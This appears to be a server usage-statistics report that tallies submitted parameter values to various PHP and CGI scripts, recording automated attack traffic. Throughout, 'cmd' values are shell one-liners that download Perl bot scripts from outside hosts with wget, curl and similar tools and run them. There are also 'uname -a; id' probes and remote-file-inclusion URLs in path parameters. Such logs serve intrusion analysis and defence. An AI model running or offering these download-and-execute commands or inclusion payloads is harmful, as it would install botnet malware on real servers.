cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	9
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	8
uname -a; id	6
cd /tmp;rm root.txt;wget www.3sk3nt.kit.net/root.txt;fetch w ww.3sk3nt.kit.net/root.txt;lwp-download www.3sk3nt.kit.net/r oot.txt;curl -O www.3sk3nt.kit.net/root.txt;lynx www.3sk3nt. kit.net/root.txt;perl root.txt	3
cd /tmp;wget http://mensagenss.hospedagemdesite.com/bot/bot_ ao.txt;curl -O -f http://mensagenss.hospedagemdesite.com/bot /bot_ao.txt;lynx -source http://mensagenss.hospedagemdesite. com/bot/bot_ao.txt;lwp-rget http://mensagenss.hospedagemdesi te.com/bot/bot_ao.txt;fetch http://mensagenss.hospedagemdesi te.com/bot/bot_ao.txt;perl bot_ao.txt;rm -rf bot_ao.txt	3
killall -9 perl;rm spriter1.txt;wget http://www.hobbiz.com/U P/spriter1.txt;curl -o spriter1.txt http://www.hobbiz.com/UP /spriter1.txt;perl spriter1.txt	3
wget http://www.hobbiz.com/UP/spriter1.txt;curl -o spriter1. txt http://www.hobbiz.com/UP/spriter1.txt;perl spriter1.txt	2
cd /tmp;rm bot123ffiii.txt;wget www.xsenharox.xpg.com.br/bot 123ffiii.txt;fetch www.xsenharox.xpg.com.br/bot123ffiii.txt; lwp-download www.xsenharox.xpg.com.br/bot123ffiii.txt;curl - O www.xsenharox.xpg.com.br/bot123ffiii.txt;lynx www.xsenharo x.xpg.com.br/bot123ffiii.txt;perl bot123ffiii.txt	2
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h ttp://www.anje.pt/ip1.txt;wget http://www.anje.pt/ros1.txt;w get http://www.anje.pt/scanasc.txt;curl -o ip1.txt http://ww w.anje.pt/ip1.txt;curl -o ros1.txt http://www.anje.pt/ros1.t xt;curl -o scanasc.txt http://www.anje.pt/scanasc.txt;perl i p1.txt;perl ros1.txt;perl scanasc.txt	2
id	2
Parameter	css_path
Value	Accesses
http://invisionar.hostinggratisargentina.com/eth0?	47
http://ownsirc.googlepages.com/botnet.txt?	38
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	23
http://208.74.174.183/brizola.txt?	20
http://www.oslutadores.com/?id=23530	18
http://normanzito.iespana.es/http.txt??	15
http://gikowns.googlepages.com/BOTNET-BRIZOLA.txt?	13
http://ownsparaficar.googlepages.com/funfo.txt?	13
http://204.11.228.115/id.txt?	11
http://overowns.googlepages.com/testera.txt?	11
Parameter	list
Value	Accesses
1	9
OTHER:	1,033
Script	Total Accesses
/cgi-bin/plugins/neomail/neomail.pl	1,254
Parameters by Submitted Value
Parameter	action
Value	Accesses
readmessage	114
displayheaders	40
composemessage	27
logout	6
emptytrash	4
Parameter	composetype
Value	Accesses
forward	13
reply	8
replyall	3
Parameter	custompage
Value	Accesses
3	5
2	1
Parameter	firstmessage
Value	Accesses
1	167
31	10
61	3
60	1
30	1
151	1
121	1
91	1
Parameter	folder
Value	Accesses
INBOX	160
	14
SAVED	9
TRASH	7
SENT	1
Parameter	headers
Value	Accesses
simple	57
Parameter	message_id
Value	Accesses
cc70a53a6ce846358350235dbdad5786	12
75f33a8c1ed1d9837be353ffe9017350	8
80500558a81fd9a79fca114b0fe48b66	5
bb4999647043470ec4986b7829a974fc	4
a5bfc665bf76143d65e79d8a1b422a54	4
62d14cc55d03d8cac3a1bb164a24da1c	4
870a4d5e068b0df113612361bf4db405	3
cbb7fb72d5b18f4b1803e38db14d2e0e	3
fe4107fdfba6b1addfeb8d8633500764	3
f828f9212b98f2b7bd2625cf2f920ea0	3
Parameter	sessionid
Value	Accesses
mickey-session-0.496305458554165	53
mickey-session-0.768175121936114	17
mickey-session-0.403925060368241	17
killianey-session-0.0750747035062922	15
mickey-session-0.141304360077815	15
mickey-session-0.860474512753175	10
mickey-session-0.688039203946577	10
mickey-session-0.445742682161839	9
mickey-session-0.293016888274909	7
mickey-session-0.669192745656805	7
Parameter	sort
Value	Accesses
date	141
sender	28
subject	22
Parameter	status
Value	Accesses
	37
RO	12
R	7
U	1
OTHER:	143
Script	Total Accesses
/wusage/summary/cgi.html/display.php	1,223
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	14
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	12
uname -a; id	9
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no- ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p erl botnet.txt	6
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	4
cd /tmp;rm botnet.txt;wget http://euseiquefiz.no-ip.info/bot net.txt;fetch http://euseiquefiz.no-ip.info/botnet.txt;lwp-d ownload http://euseiquefiz.no-ip.info/botnet.txt;curl -O htt p://euseiquefiz.no-ip.info/botnet.txt;lynx http://euseiquefi z.no-ip.info/botnet.txt;perl botnet.txt	4
id	3
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch http://71.41.190.203/sur0.txt;lwp-download http://71.41.190 .203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*	3
cd /tmp;rm bunda24.txt;wget http://www.octium.ru//language/b unda24.txt;fetch http://www.octium.ru//language/bunda24.txt; lwp-download http://www.octium.ru//language/bunda24.txt;curl -O http://www.octium.ru//language/bunda24.txt;lynx http://w ww.octium.ru//language/bunda24.txt;perl bunda24.txt;rm -rf * .txt	2
cd /tmp;rm -rf fuck.txt;wget http://h1.ripway.com/renatas2/f uck.txt;fetch http://h1.ripway.com/renatas2/fuck.txt;curl -O http://h1.ripway.com/renatas2/fuck.txt;perl fuck.txt;rm -rf fuck.txt	2
Parameter	list
Value	Accesses
1	1
Parameter	pag
Value	Accesses
http://www.jungo8949.co.kr/tool25.txt?	26
	19
http://www.tudoprosperar.kit.net/x.txt?	18
http://www.pucorp.t5.com.br/lp.txt?	18
http://189.23.251.131/~tiago/new.txt?	17
http://www.capsoir.com/images/TRA.txt?	16
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat?	15
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	15
http://ownsparaficar.googlepages.com/funfo.txt?	14
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	12
OTHER:	993
Script	Total Accesses
/wusage/weekly/	1,180
Parameters by Submitted Value
Parameter	//kboard/kboard.php?board
Value	Accesses
notice	2
Parameter	BESIDER
Value	Accesses
http://elitewa.go.ro/copyright.txt??	1
Parameter	DOCUMENT_ROOT
Value	Accesses
http://www.enyzone.cz/components/com_poll/z1??	10
http://users4.nofeehost.com/anjrit/fx/id1.txt??	3
http://www.mama-nsk.ru/fx29id.txt?	3
http://www.steannareptile.it//administrator/id1.txt??	3
http://pdcmanagement.com///idfx1.gif???	3
http://islamicdesigns.askmuslims.com/FX29ID1.txt?	2
http://jeffbickford.com/widgets/z1??	2
http://www.fraternidadsinaloense.com/foro/uiu.txt??	1
http://largeface.com/gnuboard4/gnus/fxid.txt?	1
http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt ??	1
Parameter	GALLERY_BASEDIR
Value	Accesses
http://www.leegolf.com/vboard/data/idxx.txt??	3
Parameter	GLOBALS
Value	Accesses
	1
Parameter	GOODS[gs_input]
Value	Accesses
deadbeef	14
Parameter	GOODS[no]
Value	Accesses
deadbeef	14
Parameter	INCLUDE_FOLDER
Value	Accesses
http://gumansin.com/id.txt??	2
http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt?	1
Parameter	INC_DIR
Value	Accesses
http://www.tos-belarus.org/scan/copyright.txt???	1
Parameter	REX[INCLUDE_PATH]
Value	Accesses
http://dhcom.co.kr/zboard/id.txt??	3
http://www.curling-erfurt.de/media/id1.txt??	1
http://125.163.251.219/har/fx29id1.txt??	1
OTHER:	1,107
Script	Total Accesses
/wusage/summary/cgi.html//skin/zero_vote/ask_password.php	1,179
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm botnet.txt;wget http://www.powerbikes.gr/forum/bo tnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt;lwp -download http://www.powerbikes.gr/forum/botnet.txt;curl -O http://www.powerbikes.gr/forum/botnet.txt;lynx http://www.po werbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.txt	1
Parameter	dir
Value	Accesses
http://www.mta.cl/galeria2/galery.txt?	82
http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt? ?	44
http://www.vsm.gov.tr/pwnd/safe.gif?	32
http://www.ar-vision.com/galery.txt?	22
http://x.apescar.net/r1.jpg??	19
http://www.burhanukum.com/images/galery.txt?	19
http://www.gumgangfarm.com/shop/data/id.txt?	16
http://www.seventhtavern.com/images/id.txt?	15
http://www.mta.cl/galeria2/galery.txt???	14
http://normanzito.iespana.es/http.txt??	14
OTHER:	901
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/faqsupport/include.php	1,108
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	9
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	6
uname -a; id	5
cd /tmp;rm bn.txt;wget http://nofxd.110mb.com/bot.txt;fetch http://nofxd.110mb.com/bot.txt;lwp-download http://nofxd.110 mb.com/bot.txt;curl -O http://nofxd.110mb.com/bot.txt;lynx h ttp://nofxd.110mb.com/bot.txt;perl bot.txt	5
cd /tmp;wget http://spamroxx.iespana.es/atkbotnet.txt;perl a tkbotnet.txt	5
cd /tmp;rm botnet.txt;wget http://euseiquefiz.no-ip.info/bot net.txt;fetch http://euseiquefiz.no-ip.info/botnet.txt;lwp-d ownload http://euseiquefiz.no-ip.info/botnet.txt;curl -O htt p://euseiquefiz.no-ip.info/botnet.txt;lynx http://euseiquefi z.no-ip.info/botnet.txt;perl botnet.txt	4
cd /tmp;wget http://www.iakh.de/oneadmin/calendar/ao.txt;cur l -O -f http://www.iakh.de/oneadmin/calendar/ao.txt;lynx -so urce http://www.iakh.de/oneadmin/calendar/ao.txt;lwp-rget ht tp://www.iakh.de/oneadmin/calendar/ao.txt;fetch http://www.i akh.de/oneadmin/calendar/ao.txtt;perl ao.txt;rm -rf ao.txt	3
cd /tmp;rm enviar.txt;wget http://br.geocities.com/svconts/e nviar.txt;fetch http://br.geocities.com/svconts/enviar.txt;l wp-download http://br.geocities.com/svconts/enviar.txt;curl -O http://br.geocities.com/svconts/enviar.txt;lynx http://br .geocities.com/svconts/enviar.txt;perl enviar.txt	3
cd /tmp;wget http://www.iradex.kit.net/spk/spk.txt;curl -O h ttp://www.iradex.kit.net/spk/spk.txt;lwp-download -a http:// www.iradex.kit.net/spk/spk.txt;GET http://www.iradex.kit.net /spk/spk.txt;lynx -source http://www.iradex.kit.net/spk/spk. txt;links -source http://www.iradex.kit.net/spk/spk.txt;perl spk.txt;rm -rf spk.txt;rm -rf spk001.txt	3
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	3
Parameter	list
Value	Accesses
1	4
Parameter	path[docroot]
Value	Accesses
http://invisionar.hostinggratisargentina.com/eth0?	43
http://www.jungo8949.co.kr/tool25.txt?	21
http://www.diabinhoinfernal.kit.net/iLeGaiS/tool25.txt?	16
http://ownsirc.googlepages.com/botnet.txt?	13
	12
http://bgeunivers.free.fr/modules/AllMyGuests/tool25.dat?	12
http://www.neoncomanda.kit.net/tool25.dat?	12
http://freewebs.com/tow1337/x.txt?	11
http://www.freewebs.com/tow1337/rmn2.txt?	10
http://zuwill.110mb.com/BotneT.txt?	10
OTHER:	898
Script	Total Accesses
/wusage/summary/cgi.html//samplenewsletter.php	1,019
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	12
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	9
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch http://71.41.190.203/sur0.txt;lwp-download http://71.41.190 .203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*	7
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	4
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http:// pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	4
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt; fetch http://SITE/bot.txt;lwp-download http://www.ownedson.1 10mb.com/bn.txt;curl -O http://www.ownedson.110mb.com/bn.txt ;lynx http://www.ownedson.110mb.com/bn.txt;perl bn.txt	4
uname -a; id	4
cd /tmp;rm subale.txt;wget http://71.41.190.203/subale.txt;f etch http://71.41.190.203/subale.txt;lwp-download http://71. 41.190.203/subale.txt;curl -O http://71.41.190.203/subale.tx t;lynx http://71.41.190.203/subale.txt;perl subale.txt;rm -r f *.txt	4
cd /tmp;rm bunda24.txt;wget http://www.octium.ru//language/b unda24.txt;fetch http://www.octium.ru//language/bunda24.txt; lwp-download http://www.octium.ru//language/bunda24.txt;curl -O http://www.octium.ru//language/bunda24.txt;lynx http://w ww.octium.ru//language/bunda24.txt;perl bunda24.txt;rm -rf * .txt	3
cd /tmp;rm -rf tut;wget http://inimigo.t35.com/tut.txt;lwp- download http://inimigo.t35.com/tut.txt;fetch http://inimigo .t35.com/tut.txt;curl -o tut.txt http://inimigo.t35.com/tut. txt;GET http://inimigo.t35.com/tut.txt >tut.txt;lynx -source http://inimigo.t35.com/tut.txt >tut.txt;perl tut.txt;rm -rf tut.txt	3
Parameter	list
Value	Accesses
1	9
Parameter	path[docroot]
Value	Accesses
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	37
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	28
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat?	17
http://usuarios.arnet.com.ar/larry123/ka.txt?	16
http://www.jungo8949.co.kr/tool25.txt?	12
http://h1.ripway.com/DiegoVirus/pbot.txt?	12
http://www.neoncomanda.kit.net/tool25.dat?	11
http://ownsirc.googlepages.com/botnet.txt?	11
http://www.vsm.gov.tr/gorselbasin/docs/gorselbasin/aw128.txt ?	10
http://www.h4x0r-s.kit.net/tool/tool25.dat?	9
OTHER:	793
Script	Total Accesses
/wusage/summary/cgi.html//faqsupport/samplefaqsupport.php	1,012
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	12
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	10
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	7
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	7
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no- ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p erl botnet.txt	6
uname -a; id	5
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt; fetch http://www.killersofdragons.com/x.txt;lwp-download htt p://www.killersofdragons.com/x.txt;curl -O http://www.killer sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x. txt;perl x.txt	4
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4 0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1 89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt	4
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http:// pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	3
cd /tmp;rm bot.txt;wget http://www.3sk3nt.by.ru/bot.txt;fetc h http://www.3sk3nt.by.ru/bot.txt;lwp-download http://www.3s k3nt.by.ru/bot.txt;curl -O http://www.3sk3nt.by.ru/bot.txt;l ynx http://www.3sk3nt.by.ru/bot.txt;perl bot.txt	3
Parameter	list
Value	Accesses
1	1
Parameter	path
Value	Accesses
http://www.mta.cl/galeria2/galery.txt?	1
Parameter	path[docroot]
Value	Accesses
http://www.jungo8949.co.kr/tool25.txt?	44
http://www.cosmick.kit.net/ty.txt?	24
http://www.capsoir.com/images/TRA.txt?	22
http://www.neoncomanda.kit.net/tool25.dat?	16
http://proxysx.t35.com/x0.txt?	14
http://www.pucorp.t5.com.br/lp.txt?	14
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	12
http://aszer.republika.pl/cos..txt?	12
	10
http://aszer.republika.pl/cos1..txt?	10
Parameter	path[docroot]http://phoenixgc.net/sikat?
Value	Accesses
	2
OTHER:	769
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter
Value	Accesses
	1
Parameter	cmd
Value	Accesses
cd /tmp;rm botnet.txt;wget http://noden.110mb.com/botnet.txt ;fetch http://noden.110mb.com/botnet.txt;lwp-download http:/ /noden.110mb.com/botnet.txt;curl -O http://noden.110mb.com/b otnet.txt;lynx http://noden.110mb.com/botnet.txt;perl botnet .txt;rm botnet.txt	10
cd /tmp;rm botnet.txt;wget http://www.powerbikes.gr/forum/bo tnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt;lwp -download http://www.powerbikes.gr/forum/botnet.txt;curl -O http://www.powerbikes.gr/forum/botnet.txt;lynx http://www.po werbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.txt	8
uname -a; id	4
OTHER:	947
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
cd /tmp;rm -rf pacote;wget http://br.geocities.com/ozaminha /pacote.txt;lwp-download http://br.geocities.com/ozaminha/pa cote.txt;fetch http://br.geocities.com/ozaminha/pacote.txt;c url -o pacote.txt http://br.geocities.com/ozaminha/pacote.tx t;GET http://br.geocities.com/ozaminha/pacote.txt >pacote.tx t;lynx -source http://br.geocities.com/ozaminha/pacote.txt > pacote.txt;perl pacote.txt;rm -rf pacote.txt	19
OTHER:	951
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
cd /tmp;rm -rf tut;wget http://inimigo.t35.com/tut.txt;lwp- download http://inimigo.t35.com/tut.txt;fetch http://inimigo .t35.com/tut.txt;curl -o tut.txt http://inimigo.t35.com/tut. txt;GET http://inimigo.t35.com/tut.txt >tut.txt;lynx -source http://inimigo.t35.com/tut.txt >tut.txt;perl tut.txt;rm -rf tut.txt	3
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
cd /tmp;rm -rf *;cd /tmp;lwp-download http://br.geocities.co m/ozaminha/pacote.txt;fetch http://br.geocities.com/ozaminha /pacote.txt;curl -o pacote.txt http://br.geocities.com/ozami nha/pacote.txt;wget http://br.geocities.com/ozaminha/pacote. txt;perl pacote.txt	5
cd /tmp;killall perl -9;rm -rf *.txt;GET http://murilok.pop3 .ru/RFI3.txt > RFI3.txt;perl RFI3.txt;rm RFI3.txt	3
cd /tmp;rm -rf pitbull;wget http://br.geocities.com/p4ulo.h ack/pitbull.txt;lwp-download http://br.geocities.com/p4ulo.h ack/pitbull.txt;fetch http://br.geocities.com/p4ulo.hack/pit bull.txt;curl -o pitbull.txt http://br.geocities.com/p4ulo.h ack/pitbull.txt;GET http://br.geocities.com/p4ulo.hack/pitbu ll.txt >pitbull.txt;lynx -source http://br.geocities.com/p4u lo.hack/pitbull.txt;perl pitbull.txt;rm -rf pitbull.txt	3
cd /tmp;wget http://vsffdp.iespana.es/1.txt;curl -O http://v sffdp.iespana.es/1.txt;fetch http://vsffdp.iespana.es/1.txt; lynx http://vsffdp.iespana.es/1.txt;lwp-download http://vsff dp.iespana.es/1.txt;perl 1.txt	3
OTHER:	956
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	9
OTHER:	961
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
cd /tmp;wget http://206.71.148.89/ferita.txt;curl -O -f http ://206.71.148.89/ferita.txt;lynx -source http://206.71.148.8 9/ferita.txt;lwp-rget http://206.71.148.89/ferita.txt;fetch http://206.71.148.89/ferita.txt;perl ferita.txt;rm -rf ferit a.txt	3
uname -a; id	3
OTHER:	964
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt; fetch http://SITE/bot.txt;lwp-download http://www.ownedson.1 10mb.com/bn.txt;curl -O http://www.ownedson.110mb.com/bn.txt ;lynx http://www.ownedson.110mb.com/bn.txt;perl bn.txt	3
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
cd /tmp;rm -rf scan;wget http://br.geocities.com/chatbr.own z/scan.txt;lwp-download http://br.geocities.com/chatbr.ownz/ scan.txt;fetch http://br.geocities.com/chatbr.ownz/scan.txt; curl -o scan.txt http://br.geocities.com/chatbr.ownz/scan.tx t;GET http://br.geocities.com/chatbr.ownz/scan.txt >scan.txt ;lynx -source http://br.geocities.com/chatbr.ownz/scan.txt > scan.txt;perl scan.txt;rm -rf scan.txt	2
cd /tmp;rm -rf *;cd /tmp;lwp-download http://h1.ripway.com/k aiooo/pacote.txt;fetch http://h1.ripway.com/kaiooo/pacote.tx t;curl -o pacote.txt http://h1.ripway.com/kaiooo/pacote.txt; wget http://h1.ripway.com/kaiooo/pacote.txt;perl pacote.txt	2
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
cd /tmp;rm botnet.txt;wget http://nodan.110mb.com/botnet.txt ;fetch http://nodan.110mb.com/botnet.txt;lwp-download http:/ /nodan.110mb.com/botnet.txt;curl -O http://nodan.110mb.com/b otnet.txt;lynx http://nodan.110mb.com/botnet.txt;perl botnet .txt;rm botnet.txt	10
OTHER:	960
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
cd /tmp;rm ful.txt;wget http://71.41.190.203/ful.txt;fetch h ttp://71.41.190.203/ful.txt;lwp-download http://71.41.190.20 3/ful.txt;curl -O http://71.41.190.203/ful.txt;lynx http://7 1.41.190.203/ful.txt;perl ful.txt;rm -rf ful.txt*	2
cd /tmp;rm s1t2a3r4t.txt;wget http://189.24.46.160:9090/s1t2 a3r4t.txt;fetch http://189.24.46.160:9090/s1t2a3r4t.txt;lwp- download http://189.24.46.160:9090/s1t2a3r4t.txt;curl -O htt p://189.24.46.160:9090/s1t2a3r4t.txt;lynx http://189.24.46.1 60:9090/s1t2a3r4t.txt;perl s1t2a3r4t.txt;rm s1t2a3r4t.txt	2
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	5
OTHER:	965
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
cd /tmp;rm start.txt;wget http://71.41.190.203/start.txt;fet ch http://71.41.190.203/start.txt;lwp-download http://71.41. 190.203/start.txt;curl -O http://71.41.190.203/start.txt;lyn x http://71.41.190.203/start.txt;perl start.txt;rm -rf start .txt*	2
cd /tmp;rm -rf ChatBR;wget http://br.geocities.com/chatbr.o wnz/ChatBR.txt;lwp-download http://br.geocities.com/chatbr.o wnz/ChatBR.txt;fetch http://br.geocities.com/chatbr.ownz/Cha tBR.txt;curl -o ChatBR.txt http://br.geocities.com/chatbr.ow nz/ChatBR.txt;GET http://br.geocities.com/chatbr.ownz/ChatBR .txt >ChatBR.txt;lynx -source http://br.geocities.com/chatbr .ownz/ChatBR.txt;perl ChatBR.txt;rm -rf ChatBR.txt	2
cd /tmp;wget http://74.63.66.62/ferinhaa.txt;curl -O -f http ://74.63.66.62/ferinhaa.txt;lynx -source http://74.63.66.62/ ferinhaa.txt;lwp-rget http://74.63.66.62/ferinhaa.txt;fetch http://74.63.66.62/ferinhaa.txt;perl ferinhaa.txt;rm -rf fer inhaa.txt	2
OTHER:	964
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
